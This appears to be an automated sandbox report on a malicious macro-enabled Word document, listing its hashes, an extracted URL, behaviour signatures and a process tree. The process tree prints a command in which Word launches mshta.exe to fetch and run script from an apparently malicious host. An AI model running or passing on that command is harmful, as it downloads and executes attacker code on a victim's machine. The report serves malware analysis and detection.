Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 14:30
Behavioral task
behavioral1
Sample
edcb262923c5d492034f6db5dba88cc5_JaffaCakes118.docm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
edcb262923c5d492034f6db5dba88cc5_JaffaCakes118.docm
Resource
win10v2004-20240802-en
General
-
Target
edcb262923c5d492034f6db5dba88cc5_JaffaCakes118.docm
-
Size
53KB
-
MD5
edcb262923c5d492034f6db5dba88cc5
-
SHA1
49db9d14abe36ce23a24209eb3070038a6714e65
-
SHA256
e15200f16ce6d15b4405184bd6fb3889731ba3de306844f76913113e26146cf2
-
SHA512
ed8c3e54b1dd5d687b3c0c65c4826783c1ac43b224cefe87b08aecc00b406f139fa22aa5289e0752e03b360b97d8c9c0f4c34d09f6c5f81ab2265845b012a7bf
-
SSDEEP
768:amTSRcEBIbNN8+iUQDq9BhWUcl4RUf8W9DXlWXEjQfUsbyu9hfMQmQMjIybCJou1:2BaiUQm7hlcuaLgTfU6VrZNAkLu44q
Malware Config
Extracted
http://qdijqwdunqwiqhwew.com/NA/smix.php?utma=donj
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1336 3028 mshta.exe 29 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Office loads VBA resources, possible macro or embedded object present
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3028 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3028 WINWORD.EXE 3028 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2776 3028 WINWORD.EXE 31 PID 3028 wrote to memory of 2776 3028 WINWORD.EXE 31 PID 3028 wrote to memory of 2776 3028 WINWORD.EXE 31 PID 3028 wrote to memory of 2776 3028 WINWORD.EXE 31 PID 3028 wrote to memory of 1336 3028 WINWORD.EXE 33 PID 3028 wrote to memory of 1336 3028 WINWORD.EXE 33 PID 3028 wrote to memory of 1336 3028 WINWORD.EXE 33 PID 3028 wrote to memory of 1336 3028 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\edcb262923c5d492034f6db5dba88cc5_JaffaCakes118.docm"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2776
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe http://qdijqwdunqwiqhwew.com/NA/smix.php?utma=donj2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1336
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD552a24920597910fb9654f8712a7ba58c
SHA1083a694481af9ec1ad358f35c17326b6658f5a6c
SHA256697a1ba27bf32be12cf88fd72cd0492c5b4644a05751fe99fbac844cf5a6cfa3
SHA512e9abf4d4deede74a0521c75e8bff6b78f071016b8f3b10f85678e176772a3e3e28d68914fe67d737e811c03321b0b842471a373897ace5902649e139ca4aad4e